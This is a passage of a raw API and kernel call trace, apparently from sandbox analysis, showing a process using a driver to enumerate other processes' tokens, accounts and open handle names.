lpBytesReturned=0x12d450*=0x138, lpOverlapped=0x0) returned 1 [0148.919] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.919] PsAcquireProcessExitSynchronization () returned 0x0 [0148.919] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0148.920] ObReferenceObjectByHandle (in: Handle=0x1384, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001aebe00, HandleInformation=0x0) returned 0x0 [0148.920] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.920] PsReleaseProcessExitSynchronization () returned 0x2 [0148.920] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18b [0148.920] ObQueryNameString (in: Object=0xfffff8a001aebe00, ObjectNameInfo=0xfffffa8002fe2044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fe2044, ReturnLength=0xfffff88005163550) returned 0x0 [0148.920] ObfDereferenceObject (Object=0xfffff8a001aebe00) returned 0x2 [0148.920] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.920] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x47c) returned 0xc8 [0148.920] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0148.920] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8003755060, HandleInformation=0x0) returned 0x0 [0148.920] ObOpenObjectByPointer (in: Object=0xfffffa8003755060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0148.920] ObfDereferenceObject (Object=0xfffffa8003755060) returned 0x44 [0148.920] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa80039a7780 | out: TokenHandle=0xfffffa80039a7780*=0xc4) returned 0x0 [0148.920] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0148.921] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.921] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0148.921] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0148.923] CloseHandle (hObject=0xc4) returned 1 [0148.923] CloseHandle (hObject=0xc8) returned 1 [0148.923] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.923] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0148.923] PsLookupProcessByProcessId (in: ProcessId=0x47c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.923] PsAcquireProcessExitSynchronization () returned 0x0 [0148.923] KeStackAttachProcess (in: PROCESS=0xfffffa8003755060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003755060, ApcState=0xfffff880051635d0) [0148.923] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003780230, HandleInformation=0x0) returned 0x0 [0148.924] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.924] PsReleaseProcessExitSynchronization () returned 0x2 [0148.924] ObfDereferenceObject (Object=0xfffffa8003755060) returned 0x42 [0148.924] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fed044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fed044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.924] ObfDereferenceObject (Object=0xfffffa8003780230) returned 0x1 [0148.924] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.924] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.924] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.924] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0148.924] PsLookupProcessByProcessId (in: ProcessId=0x47c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.924] PsAcquireProcessExitSynchronization () returned 0x0 [0148.924] KeStackAttachProcess (in: PROCESS=0xfffffa8003755060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003755060, ApcState=0xfffff880051635d0) [0148.924] ObReferenceObjectByHandle (in: Handle=0xd4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80037be070, HandleInformation=0x0) returned 0x0 [0148.924] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.924] PsReleaseProcessExitSynchronization () returned 0x2 [0148.925] ObfDereferenceObject (Object=0xfffffa8003755060) returned 0x42 [0148.925] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8002f29044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f29044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.925] ObfDereferenceObject (Object=0xfffffa80037be070) returned 0x1 [0148.925] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.925] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.925] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.925] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0148.925] PsLookupProcessByProcessId (in: ProcessId=0x47c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.925] PsAcquireProcessExitSynchronization () returned 0x0 [0148.925] KeStackAttachProcess (in: PROCESS=0xfffffa8003755060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003755060, ApcState=0xfffff880051635d0) [0148.925] ObReferenceObjectByHandle (in: Handle=0x14c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80023549d0, HandleInformation=0x0) returned 0x0 [0148.925] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.925] PsReleaseProcessExitSynchronization () returned 0x2 [0148.925] ObfDereferenceObject (Object=0xfffffa8003755060) returned 0x42 [0148.925] ObQueryNameString (in: Object=0xfffffa80023549d0, ObjectNameInfo=0xfffffa8002faa044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002faa044, ReturnLength=0xfffff88005163550) returned 0x0 [0148.925] ObfDereferenceObject (Object=0xfffffa80023549d0) returned 0x1 [0148.926] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.926] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.926] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4bc) returned 0xc8 [0148.926] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0148.926] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80037e1060, HandleInformation=0x0) returned 0x0 [0148.926] ObOpenObjectByPointer (in: Object=0xfffffa80037e1060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0148.926] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xba [0148.926] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa80039a7780 | out: TokenHandle=0xfffffa80039a7780*=0xc4) returned 0x0 [0148.926] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0148.926] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.926] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0148.926] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="LOCAL SERVICE", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0148.928] CloseHandle (hObject=0xc4) returned 1 [0148.928] CloseHandle (hObject=0xc8) returned 1 [0148.928] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.928] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0148.928] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.928] PsAcquireProcessExitSynchronization () returned 0x0 [0148.928] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0) [0148.929] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80037cd370, HandleInformation=0x0) returned 0x0 [0148.929] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.929] PsReleaseProcessExitSynchronization () returned 0x2 [0148.929] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0148.929] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fd0584, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fd0584, ReturnLength=0xfffff88005163508) returned 0x0 [0148.929] ObfDereferenceObject (Object=0xfffffa80037cd370) returned 0x1 [0148.929] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.929] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.929] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.929] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0148.929] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.929] PsAcquireProcessExitSynchronization () returned 0x0 [0148.929] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0) [0148.929] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80037ca070, HandleInformation=0x0) returned 0x0 [0148.929] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.929] PsReleaseProcessExitSynchronization () returned 0x2 [0148.929] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0148.929] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa80030277c4, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030277c4, ReturnLength=0xfffff88005163508) returned 0x0 [0148.929] ObfDereferenceObject (Object=0xfffffa80037ca070) returned 0x1 [0148.929] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.930] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.930] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.930] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0148.930] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.930] PsAcquireProcessExitSynchronization () returned 0x0 [0148.930] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0) [0148.930] ObReferenceObjectByHandle (in: Handle=0xe8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003854510, HandleInformation=0x0) returned 0x0 [0148.930] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.930] PsReleaseProcessExitSynchronization () returned 0x2 [0148.930] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0148.930] ObQueryNameString (in: Object=0xfffffa80027af4e0, ObjectNameInfo=0xfffffa8002fdb044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fdb044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.930] ObfDereferenceObject (Object=0xfffffa8003854510) returned 0x1 [0148.930] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.930] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.930] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.930] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0148.930] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.930] PsAcquireProcessExitSynchronization () returned 0x0 [0148.930] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0) [0148.930] ObReferenceObjectByHandle (in: Handle=0xec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003855730, HandleInformation=0x0) returned 0x0 [0148.930] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.930] PsReleaseProcessExitSynchronization () returned 0x2 [0148.930] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0148.931] ObQueryNameString (in: Object=0xfffffa80027af4e0, ObjectNameInfo=0xfffffa8002fe6044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fe6044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.931] ObfDereferenceObject (Object=0xfffffa8003855730) returned 0x1 [0148.931] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.931] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.931] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.931] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0148.931] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.931] PsAcquireProcessExitSynchronization () returned 0x0 [0148.931] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0) [0148.931] ObReferenceObjectByHandle (in: Handle=0xf0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80038504b0, HandleInformation=0x0) returned 0x0 [0148.931] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.931] PsReleaseProcessExitSynchronization () returned 0x2 [0148.931] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0148.931] ObQueryNameString (in: Object=0xfffffa80027acc70, ObjectNameInfo=0xfffffa8002fe7044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fe7044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.931] ObfDereferenceObject (Object=0xfffffa80038504b0) returned 0x1 [0148.931] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.931] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.931] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.931] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x2c, lpOverlapped=0x0) returned 1 [0148.931] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.932] PsAcquireProcessExitSynchronization () returned 0x0 [0148.932] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0) [0148.932] ObReferenceObjectByHandle (in: Handle=0xf4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003851070, HandleInformation=0x0) returned 0x0 [0148.932] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.932] PsReleaseProcessExitSynchronization () returned 0x2 [0148.932] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0148.932] ObQueryNameString (in: Object=0xfffffa80027b0e40, ObjectNameInfo=0xfffffa8002fea044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fea044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.932] ObfDereferenceObject (Object=0xfffffa8003851070) returned 0x1 [0148.932] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.932] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.932] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.932] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0148.932] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.932] PsAcquireProcessExitSynchronization () returned 0x0 [0148.932] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0) [0148.932] ObReferenceObjectByHandle (in: Handle=0xf8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003850070, HandleInformation=0x0) returned 0x0 [0148.932] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.932] PsReleaseProcessExitSynchronization () returned 0x2 [0148.932] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0148.932] ObQueryNameString (in: Object=0xfffffa80027af2c0, ObjectNameInfo=0xfffffa8002fdc044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fdc044, ReturnLength=0xfffff88005163508) returned 0x0 [0148.932] ObfDereferenceObject (Object=0xfffffa8003850070) returned 0x1 [0148.932] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.932] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.934] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.934] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0148.934] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.934] PsAcquireProcessExitSynchronization () returned 0x0 [0148.934] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0) [0148.934] ObReferenceObjectByHandle (in: Handle=0x140, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80038885e0, HandleInformation=0x0) returned 0x0 [0148.934] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.934] PsReleaseProcessExitSynchronization () returned 0x2 [0148.934] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0148.934] ObQueryNameString (in: Object=0xfffffa80038885e0, ObjectNameInfo=0xfffffa8002f86044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f86044, ReturnLength=0xfffff88005163550) returned 0x0 [0148.934] ObfDereferenceObject (Object=0xfffffa80038885e0) returned 0x1 [0148.934] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.934] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.934] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.934] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8e, lpOverlapped=0x0) returned 1 [0148.934] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0148.934] PsAcquireProcessExitSynchronization () returned 0x0 [0148.934] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880051635d0) [0148.934] ObReferenceObjectByHandle (in: Handle=0x1c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80034a7d10, HandleInformation=0x0) returned 0x0 [0148.934] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0148.935] PsReleaseProcessExitSynchronization () returned 0x2 [0148.935] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0148.935] ObQueryNameString (in: Object=0xfffffa80034a7d10, ObjectNameInfo=0xfffffa8002feb044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002feb044, ReturnLength=0xfffff88005163550) returned 0x0 [0148.935] ObfDereferenceObject (Object=0xfffffa80034a7d10) returned 0xe [0148.935] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0148.935] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0148.935] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0148.935] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, 